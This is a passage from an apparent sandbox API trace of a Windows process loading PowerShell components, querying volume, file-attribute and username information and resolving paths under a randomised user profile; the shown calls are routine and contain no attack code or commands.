lpVolumeSerialNumber=0xae340, lpMaximumComponentLength=0xae33c, lpFileSystemFlags=0xae338, lpFileSystemNameBuffer=0x54b630, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae340*=0x9c354b42, lpMaximumComponentLength=0xae33c*=0xff, lpFileSystemFlags=0xae338*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.918] GetLastError () returned 0xcb [0076.918] SetErrorMode (uMode=0x1) returned 0x1 [0076.918] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.918] GetLastError () returned 0xcb [0076.918] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xadea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.919] GetLastError () returned 0xcb [0076.919] SetErrorMode (uMode=0x1) returned 0x1 [0076.919] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3357d74 | out: lpFileInformation=0x3357d74*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0076.919] GetLastError () returned 0xcb [0076.919] SetErrorMode (uMode=0x1) returned 0x1 [0076.919] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xadea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.919] GetLastError () returned 0xcb [0076.919] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xade2c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.919] GetLastError () returned 0xcb [0076.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.919] GetLastError () returned 0xcb [0076.921] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xadde8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.921] GetLastError () returned 0xcb [0076.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.921] GetLastError () returned 0xcb [0076.921] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xaddf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.921] GetLastError () returned 0xcb [0076.921] SetErrorMode (uMode=0x1) returned 0x1 [0076.921] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x33589cc | out: lpFileInformation=0x33589cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0076.922] GetLastError () returned 0xcb [0076.922] SetErrorMode (uMode=0x1) returned 0x1 [0076.922] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xaddf8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.922] GetLastError () returned 0xcb [0076.922] SetErrorMode (uMode=0x1) returned 0x1 [0076.922] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3358b1c | out: lpFileInformation=0x3358b1c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0076.922] GetLastError () returned 0xcb [0076.922] SetErrorMode (uMode=0x1) returned 0x1 [0076.922] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xade3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.922] GetLastError () returned 0xcb [0076.922] SetErrorMode (uMode=0x1) returned 0x1 [0076.922] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3358cbc | out: lpFileInformation=0x3358cbc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0076.922] GetLastError () returned 0xcb [0076.922] SetErrorMode (uMode=0x1) returned 0x1 [0076.922] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.923] GetLastError () returned 0xcb [0076.923] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.924] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x335ba44*="FileSystem", lpRawData=0x335b900) returned 1 [0076.924] GetLastError () returned 0x0 [0076.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.925] GetLastError () returned 0xcb [0076.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.926] GetLastError () returned 0xcb [0076.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.926] GetLastError () returned 0xcb [0076.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.926] GetLastError () returned 0xcb [0076.926] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.926] GetLastError () returned 0xcb [0076.927] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.927] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x335fb34*="Function", lpRawData=0x335f9f0) returned 1 [0076.927] GetLastError () returned 0x0 [0076.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.930] GetLastError () returned 0xcb [0076.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.936] GetLastError () returned 0xcb [0076.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.936] GetLastError () returned 0xcb [0076.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.936] GetLastError () returned 0xcb [0076.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.936] GetLastError () returned 0xcb [0076.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.976] GetLastError () returned 0xcb [0076.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.976] GetLastError () returned 0xcb [0076.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.977] GetLastError () returned 0xcb [0076.979] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.980] GetLastError () returned 0xcb [0076.980] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.980] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3378bf0*="Registry", lpRawData=0x3378aac) returned 1 [0076.981] GetLastError () returned 0x0 [0076.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.982] GetLastError () returned 0x0 [0076.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.982] GetLastError () returned 0x0 [0076.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.982] GetLastError () returned 0x0 [0076.984] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.984] GetLastError () returned 0x0 [0076.984] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.984] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x337c9d8*="Variable", lpRawData=0x337c894) returned 1 [0076.985] GetLastError () returned 0x0 [0076.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.988] GetLastError () returned 0xcb [0076.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.988] GetLastError () returned 0xcb [0076.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.988] GetLastError () returned 0xcb [0076.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.988] GetLastError () returned 0xcb [0077.045] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0077.046] GetLastError () returned 0x3 [0077.046] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0077.046] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x338a7a4*="Certificate", lpRawData=0x338a660) returned 1 [0077.047] GetLastError () returned 0x0 [0077.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.055] GetLastError () returned 0xcb [0077.063] GetLogicalDrives () returned 0x4 [0077.064] GetLastError () returned 0xcb [0077.064] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xadf3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0077.064] GetLastError () returned 0xcb [0077.064] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.064] GetLastError () returned 0xcb [0077.064] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x54b630 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0077.064] GetLastError () returned 0xcb [0077.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.066] GetLastError () returned 0xcb [0077.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.066] GetLastError () returned 0xcb [0077.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.079] GetLastError () returned 0xcb [0077.083] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xadd84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.083] GetLastError () returned 0xcb [0077.083] SetErrorMode (uMode=0x1) returned 0x1 [0077.083] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0x3393a20 | out: lpFileInformation=0x3393a20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.083] GetLastError () returned 0xcb [0077.083] SetErrorMode (uMode=0x1) returned 0x1 [0077.083] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xadd8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.083] GetLastError () returned 0xcb [0077.083] SetErrorMode (uMode=0x1) returned 0x1 [0077.083] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0x3393bf8 | out: lpFileInformation=0x3393bf8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.083] GetLastError () returned 0xcb [0077.084] SetErrorMode (uMode=0x1) returned 0x1 [0077.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xaded4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.085] GetLastError () returned 0xcb [0077.086] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0077.086] GetLastError () returned 0xcb [0077.086] SetErrorMode (uMode=0x1) returned 0x1 [0077.086] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0077.086] GetLastError () returned 0xcb [0077.086] SetErrorMode (uMode=0x1) returned 0x1 [0077.086] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0077.086] GetLastError () returned 0xcb [0077.086] SetErrorMode (uMode=0x1) returned 0x1 [0077.086] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0077.087] GetLastError () returned 0xcb [0077.087] SetErrorMode (uMode=0x1) returned 0x1 [0077.087] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0077.087] GetLastError () returned 0xcb [0077.087] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0077.087] GetLastError () returned 0xcb [0077.087] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.087] GetLastError () returned 0xcb [0077.087] SetErrorMode (uMode=0x1) returned 0x1 [0077.087] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.087] GetLastError () returned 0xcb [0077.087] SetErrorMode (uMode=0x1) returned 0x1 [0077.087] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.087] GetLastError () returned 0xcb [0077.087] SetErrorMode (uMode=0x1) returned 0x1 [0077.087] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.087] GetLastError () returned 0xcb [0077.087] SetErrorMode (uMode=0x1) returned 0x1 [0077.087] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.087] GetLastError () returned 0xcb [0077.087] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.087] GetLastError () returned 0xcb [0077.087] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.088] GetLastError () returned 0xcb [0077.088] SetErrorMode (uMode=0x1) returned 0x1 [0077.088] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0077.088] GetLastError () returned 0xcb [0077.088] SetErrorMode (uMode=0x1) returned 0x1 [0077.088] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.088] GetLastError () returned 0xcb [0077.088] SetErrorMode (uMode=0x1) returned 0x1 [0077.088] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0077.088] GetLastError () returned 0xcb [0077.088] SetErrorMode (uMode=0x1) returned 0x1 [0077.088] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.088] GetLastError () returned 0xcb [0077.088] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d 